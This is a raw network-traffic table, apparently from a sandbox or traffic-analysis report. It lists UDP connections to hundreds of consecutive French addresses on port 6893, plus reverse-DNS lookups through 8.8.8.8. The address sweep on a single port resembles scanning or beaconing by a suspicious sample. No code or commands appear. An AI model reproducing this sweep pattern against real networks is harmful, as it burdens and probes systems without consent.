| FR | 87.98.178.226:6893 | udp | |
| FR | 87.98.178.227:6893 | udp | |
| FR | 87.98.178.228:6893 | udp | |
| FR | 87.98.178.229:6893 | udp | |
| FR | 87.98.178.230:6893 | udp | |
| FR | 87.98.178.231:6893 | udp | |
| FR | 87.98.178.232:6893 | udp | |
| FR | 87.98.178.233:6893 | udp | |
| FR | 87.98.178.234:6893 | udp | |
| FR | 87.98.178.235:6893 | udp | |
| FR | 87.98.178.236:6893 | udp | |
| FR | 87.98.178.237:6893 | udp | |
| FR | 87.98.178.238:6893 | udp | |
| FR | 87.98.178.239:6893 | udp | |
| FR | 87.98.178.240:6893 | udp | |
| FR | 87.98.178.241:6893 | udp | |
| FR | 87.98.178.242:6893 | udp | |
| FR | 87.98.178.243:6893 | udp | |
| US | 8.8.8.8:53 | 95.176.98.87.in-addr.arpa | udp |
| FR | 87.98.178.244:6893 | udp | |
| FR | 87.98.178.245:6893 | udp | |
| FR | 87.98.178.246:6893 | udp | |
| FR | 87.98.178.247:6893 | udp | |
| FR | 87.98.178.248:6893 | udp | |
| US | 8.8.8.8:53 | 96.176.98.87.in-addr.arpa | udp |
| FR | 87.98.178.249:6893 | udp | |
| FR | 87.98.178.250:6893 | udp | |
| FR | 87.98.178.251:6893 | udp | |
| FR | 87.98.178.252:6893 | udp | |
| FR | 87.98.178.253:6893 | udp | |
| FR | 87.98.178.254:6893 | udp | |
| US | 8.8.8.8:53 | 97.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 100.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 102.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 105.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 106.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 107.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 109.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 108.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 111.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 110.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 112.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 113.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 114.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 115.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 116.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 117.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 118.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 119.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 120.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 121.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 122.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 123.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 124.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 125.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 127.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 126.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 128.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 129.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 130.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 132.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 135.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 136.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 137.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 139.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 141.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 142.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 143.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 145.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 146.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 147.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 148.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 150.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 152.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 153.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 155.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 156.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 158.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 160.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 159.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 161.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 162.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 163.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 164.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 165.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 166.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 167.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 168.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 169.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 170.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 173.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 174.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 175.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 176.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 177.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 178.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 179.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 180.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 181.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 182.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 184.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 185.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 186.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 187.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 188.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 189.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 190.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 192.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 193.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 197.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 199.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 201.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 202.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 204.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 207.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 208.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 210.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 211.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 212.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 213.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 214.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 216.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 218.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 219.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 220.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 221.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 222.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 223.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 224.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 229.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 230.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 231.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.176.98.87.in-addr.arpa | udp |
| FR | 87.98.178.255:6893 | udp | |
| FR | 87.98.179.0:6893 | udp | |
| FR | 87.98.179.1:6893 | udp | |
| FR | 87.98.179.2:6893 | udp | |
| FR | 87.98.179.3:6893 | udp | |
| FR | 87.98.179.4:6893 | udp | |
| FR | 87.98.179.5:6893 | udp | |
| FR | 87.98.179.6:6893 | udp | |
| FR | 87.98.179.7:6893 | udp | |
| FR | 87.98.179.8:6893 | udp | |
| FR | 87.98.179.9:6893 | udp | |
| FR | 87.98.179.10:6893 | udp | |
| FR | 87.98.179.11:6893 | udp | |
| FR | 87.98.179.12:6893 | udp | |
| FR | 87.98.179.13:6893 | udp | |
| FR | 87.98.179.14:6893 | udp | |
| FR | 87.98.179.15:6893 | udp | |
| FR | 87.98.179.16:6893 | udp | |
| FR | 87.98.179.17:6893 | udp | |
| FR | 87.98.179.18:6893 | udp | |
| FR | 87.98.179.19:6893 | udp | |
| FR | 87.98.179.20:6893 | udp | |
| FR | 87.98.179.21:6893 | udp | |
| FR | 87.98.179.22:6893 | udp | |
| FR | 87.98.179.23:6893 | udp | |
| FR | 87.98.179.24:6893 | udp | |
| FR | 87.98.179.25:6893 | udp | |
| FR | 87.98.179.26:6893 | udp | |
| FR | 87.98.179.27:6893 | udp | |
| FR | 87.98.179.28:6893 | udp | |
| FR | 87.98.179.29:6893 | udp | |
| FR | 87.98.179.30:6893 | udp | |
| FR | 87.98.179.31:6893 | udp | |
| FR | 87.98.179.32:6893 | udp | |
| FR | 87.98.179.33:6893 | udp | |
| FR | 87.98.179.34:6893 | udp | |
| FR | 87.98.179.35:6893 | udp | |
| FR | 87.98.179.36:6893 | udp | |
| FR | 87.98.179.37:6893 | udp | |
| FR | 87.98.179.38:6893 | udp | |
| FR | 87.98.179.39:6893 | udp | |
| FR | 87.98.179.40:6893 | udp | |
| FR | 87.98.179.41:6893 | udp | |
| FR | 87.98.179.42:6893 | udp | |
| FR | 87.98.179.43:6893 | udp | |
| FR | 87.98.179.44:6893 | udp | |
| FR | 87.98.179.45:6893 | udp | |
| FR | 87.98.179.46:6893 | udp | |
| FR | 87.98.179.47:6893 | udp | |
| FR | 87.98.179.48:6893 | udp | |
| FR | 87.98.179.49:6893 | udp | |
| FR | 87.98.179.50:6893 | udp | |
| FR | 87.98.179.51:6893 | udp | |
| US | 8.8.8.8:53 | 234.176.98.87.in-addr.arpa | udp |
| FR | 87.98.179.52:6893 | udp | |
| FR | 87.98.179.53:6893 | udp | |
| FR | 87.98.179.54:6893 | udp | |
| FR | 87.98.179.55:6893 | udp | |
| FR | 87.98.179.56:6893 | udp | |
| FR | 87.98.179.57:6893 | udp | |
| FR | 87.98.179.58:6893 | udp | |
| FR | 87.98.179.59:6893 | udp | |
| FR | 87.98.179.60:6893 | udp | |
| FR | 87.98.179.61:6893 | udp | |
| FR | 87.98.179.62:6893 | udp | |
| FR | 87.98.179.63:6893 | udp | |
| FR | 87.98.179.64:6893 | udp | |
| FR | 87.98.179.65:6893 | udp | |
| FR | 87.98.179.66:6893 | udp | |
| FR | 87.98.179.67:6893 | udp | |
| FR | 87.98.179.68:6893 | udp | |
| FR | 87.98.179.69:6893 | udp | |
| FR | 87.98.179.70:6893 | udp | |
| FR | 87.98.179.71:6893 | udp | |
| FR | 87.98.179.72:6893 | udp | |
| FR | 87.98.179.73:6893 | udp | |
| FR | 87.98.179.74:6893 | udp | |
| FR | 87.98.179.75:6893 | udp | |
| FR | 87.98.179.76:6893 | udp | |
| FR | 87.98.179.77:6893 | udp | |
| FR | 87.98.179.78:6893 | udp | |
| FR | 87.98.179.79:6893 | udp | |
| FR | 87.98.179.80:6893 | udp | |
| FR | 87.98.179.81:6893 | udp | |
| FR | 87.98.179.82:6893 | udp | |
| FR | 87.98.179.83:6893 | udp | |
| FR | 87.98.179.84:6893 | udp | |
| FR | 87.98.179.85:6893 | udp | |
| FR | 87.98.179.86:6893 | udp | |
| FR | 87.98.179.87:6893 | udp | |
| FR | 87.98.179.88:6893 | udp | |
| FR | 87.98.179.89:6893 | udp | |
| FR | 87.98.179.90:6893 | udp | |
| FR | 87.98.179.91:6893 | udp | |
| FR | 87.98.179.92:6893 | udp | |
| FR | 87.98.179.93:6893 | udp | |
| FR | 87.98.179.94:6893 | udp | |
| FR | 87.98.179.95:6893 | udp | |
| FR | 87.98.179.96:6893 | udp | |
| FR | 87.98.179.97:6893 | udp | |
| FR | 87.98.179.98:6893 | udp | |
| FR | 87.98.179.99:6893 | udp | |
| FR | 87.98.179.100:6893 | udp | |
| FR | 87.98.179.101:6893 | udp | |
| FR | 87.98.179.102:6893 | udp | |
| FR | 87.98.179.103:6893 | udp | |
| FR | 87.98.179.104:6893 | udp | |
| FR | 87.98.179.105:6893 | udp | |
| FR | 87.98.179.106:6893 | udp | |
| FR | 87.98.179.107:6893 | udp | |
| FR | 87.98.179.108:6893 | udp | |
| FR | 87.98.179.109:6893 | udp | |
| FR | 87.98.179.110:6893 | udp | |
| FR | 87.98.179.111:6893 | udp | |
| FR | 87.98.179.112:6893 | udp | |
| FR | 87.98.179.113:6893 | udp | |
| FR | 87.98.179.114:6893 | udp | |
| FR | 87.98.179.115:6893 | udp | |
| FR | 87.98.179.116:6893 | udp | |
| FR | 87.98.179.117:6893 | udp | |
| FR | 87.98.179.118:6893 | udp | |
| FR | 87.98.179.119:6893 | udp | |
| FR | 87.98.179.120:6893 | udp | |
| FR | 87.98.179.121:6893 | udp | |
| FR | 87.98.179.122:6893 | udp | |
| FR | 87.98.179.123:6893 | udp | |
| FR | 87.98.179.124:6893 | udp | |
| FR | 87.98.179.125:6893 | udp | |
| FR | 87.98.179.126:6893 | udp | |
| FR | 87.98.179.127:6893 | udp | |
| FR | 87.98.179.128:6893 | udp | |
| FR | 87.98.179.129:6893 | udp | |
| FR | 87.98.179.130:6893 | udp | |
| FR | 87.98.179.131:6893 | udp | |
| FR | 87.98.179.132:6893 | udp | |
| FR | 87.98.179.133:6893 | udp | |
| FR | 87.98.179.134:6893 | udp | |
| FR | 87.98.179.135:6893 | udp | |
| FR | 87.98.179.136:6893 | udp | |
| FR | 87.98.179.137:6893 | udp | |
| FR | 87.98.179.138:6893 | udp | |
| FR | 87.98.179.139:6893 | udp | |
| FR | 87.98.179.140:6893 | udp | |
| FR | 87.98.179.141:6893 | udp | |
| FR | 87.98.179.142:6893 | udp | |
| FR | 87.98.179.143:6893 | udp | |
| FR | 87.98.179.144:6893 | udp | |
| FR | 87.98.179.145:6893 | udp | |
| FR | 87.98.179.146:6893 | udp | |
| FR | 87.98.179.147:6893 | udp | |
| FR | 87.98.179.148:6893 | udp | |
| FR | 87.98.179.149:6893 | udp | |
| FR | 87.98.179.150:6893 | udp | |
| FR | 87.98.179.151:6893 | udp | |
| FR | 87.98.179.152:6893 | udp | |
| FR | 87.98.179.153:6893 | udp | |
| FR | 87.98.179.154:6893 | udp | |
| FR | 87.98.179.155:6893 | udp | |
| FR | 87.98.179.156:6893 | udp | |
| FR | 87.98.179.157:6893 | udp | |
| FR | 87.98.179.158:6893 | udp | |
| FR | 87.98.179.159:6893 | udp | |
| FR | 87.98.179.160:6893 | udp | |
| FR | 87.98.179.161:6893 | udp | |
| FR | 87.98.179.162:6893 | udp | |
| FR | 87.98.179.163:6893 | udp | |
| FR | 87.98.179.164:6893 | udp | |
| FR | 87.98.179.165:6893 | udp | |
| FR | 87.98.179.166:6893 | udp | |
| FR | 87.98.179.167:6893 | udp | |
| FR | 87.98.179.168:6893 | udp | |
| FR | 87.98.179.169:6893 | udp | |
| FR | 87.98.179.170:6893 | udp | |
| FR | 87.98.179.171:6893 | udp | |
| FR | 87.98.179.172:6893 | udp | |
| FR | 87.98.179.173:6893 | udp | |
| FR | 87.98.179.174:6893 | udp | |
| FR | 87.98.179.175:6893 | udp | |
| FR | 87.98.179.176:6893 | udp | |
| FR | 87.98.179.177:6893 | udp | |
| FR | 87.98.179.178:6893 | udp | |
| FR | 87.98.179.179:6893 | udp | |
| FR | 87.98.179.180:6893 | udp | |
| FR | 87.98.179.181:6893 | udp | |
| FR | 87.98.179.182:6893 | udp | |
| FR | 87.98.179.183:6893 | udp | |
| FR | 87.98.179.184:6893 | udp | |
| FR | 87.98.179.185:6893 | udp | |
| FR | 87.98.179.186:6893 | udp | |
| FR | 87.98.179.187:6893 | udp | |
| FR | 87.98.179.188:6893 | udp | |
| FR | 87.98.179.189:6893 | udp | |
| FR | 87.98.179.190:6893 | udp | |
| FR | 87.98.179.191:6893 | udp | |
| FR | 87.98.179.192:6893 | udp | |
| FR | 87.98.179.193:6893 | udp | |
| FR | 87.98.179.194:6893 | udp | |
| FR | 87.98.179.195:6893 | udp | |
| FR | 87.98.179.196:6893 | udp | |
| FR | 87.98.179.197:6893 | udp | |
| FR | 87.98.179.198:6893 | udp | |
| FR | 87.98.179.199:6893 | udp | |
| FR | 87.98.179.200:6893 | udp | |
| FR | 87.98.179.201:6893 | udp | |
| FR | 87.98.179.202:6893 | udp | |
| FR | 87.98.179.203:6893 | udp | |
| FR | 87.98.179.204:6893 | udp | |
| FR | 87.98.179.205:6893 | udp | |
| FR | 87.98.179.206:6893 | udp | |
| FR | 87.98.179.207:6893 | udp | |
| FR | 87.98.179.208:6893 | udp | |
| FR | 87.98.179.209:6893 | udp | |
| FR | 87.98.179.210:6893 | udp | |
| FR | 87.98.179.211:6893 | udp | |
| FR | 87.98.179.212:6893 | udp | |
| FR | 87.98.179.213:6893 | udp | |
| FR | 87.98.179.214:6893 | udp | |
| FR | 87.98.179.215:6893 | udp | |
| FR | 87.98.179.216:6893 | udp | |
| FR | 87.98.179.217:6893 | udp | |
| FR | 87.98.179.218:6893 | udp | |
| FR | 87.98.179.219:6893 | udp | |
| FR | 87.98.179.220:6893 | udp | |
| FR | 87.98.179.221:6893 | udp | |
| FR | 87.98.179.222:6893 | udp | |
| FR | 87.98.179.223:6893 | udp | |
| FR | 87.98.179.224:6893 | udp | |
| FR | 87.98.179.225:6893 | udp | |
| FR | 87.98.179.226:6893 | udp | |
| FR | 87.98.179.227:6893 | udp | |
| FR | 87.98.179.228:6893 | udp | |
| FR | 87.98.179.229:6893 | udp | |
| FR | 87.98.179.230:6893 | udp | |
| FR | 87.98.179.231:6893 | udp | |
| FR | 87.98.179.232:6893 | udp | |
| FR | 87.98.179.233:6893 | udp | |
| FR | 87.98.179.234:6893 | udp | |
| FR | 87.98.179.235:6893 | udp | |
| FR | 87.98.179.236:6893 | udp | |
| FR | 87.98.179.237:6893 | udp | |
| FR | 87.98.179.238:6893 | udp | |
| FR | 87.98.179.239:6893 | udp | |
| FR | 87.98.179.240:6893 | udp | |
| FR | 87.98.179.241:6893 | udp | |
| FR | 87.98.179.242:6893 | udp | |
| FR | 87.98.179.243:6893 | udp | |
| FR | 87.98.179.244:6893 | udp | |
| FR | 87.98.179.245:6893 | udp | |
| FR | 87.98.179.246:6893 | udp | |
| FR | 87.98.179.247:6893 | udp | |
| FR | 87.98.179.248:6893 | udp | |
| FR | 87.98.179.249:6893 | udp | |
| FR | 87.98.179.250:6893 | udp | |
| FR | 87.98.179.251:6893 | udp | |
| FR | 87.98.179.252:6893 | udp | |
| FR | 87.98.179.253:6893 | udp | |
| FR | 87.98.179.254:6893 | udp | |
| US | 8.8.8.8:53 | 235.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 236.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 238.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 239.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 242.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 244.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 243.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 245.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 246.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 247.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 248.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 249.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 250.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 251.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 252.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 253.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 254.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 255.176.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 5.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 6.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 7.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 12.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 16.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 27.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 32.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 33.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 34.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 36.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 37.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 38.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 39.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 40.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 42.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 44.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 45.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 46.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 47.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 49.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 51.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 52.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 54.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 59.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 60.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 61.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 62.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 63.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 64.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 65.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.177.98.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.177.98.87.in-addr.arpa | udp |
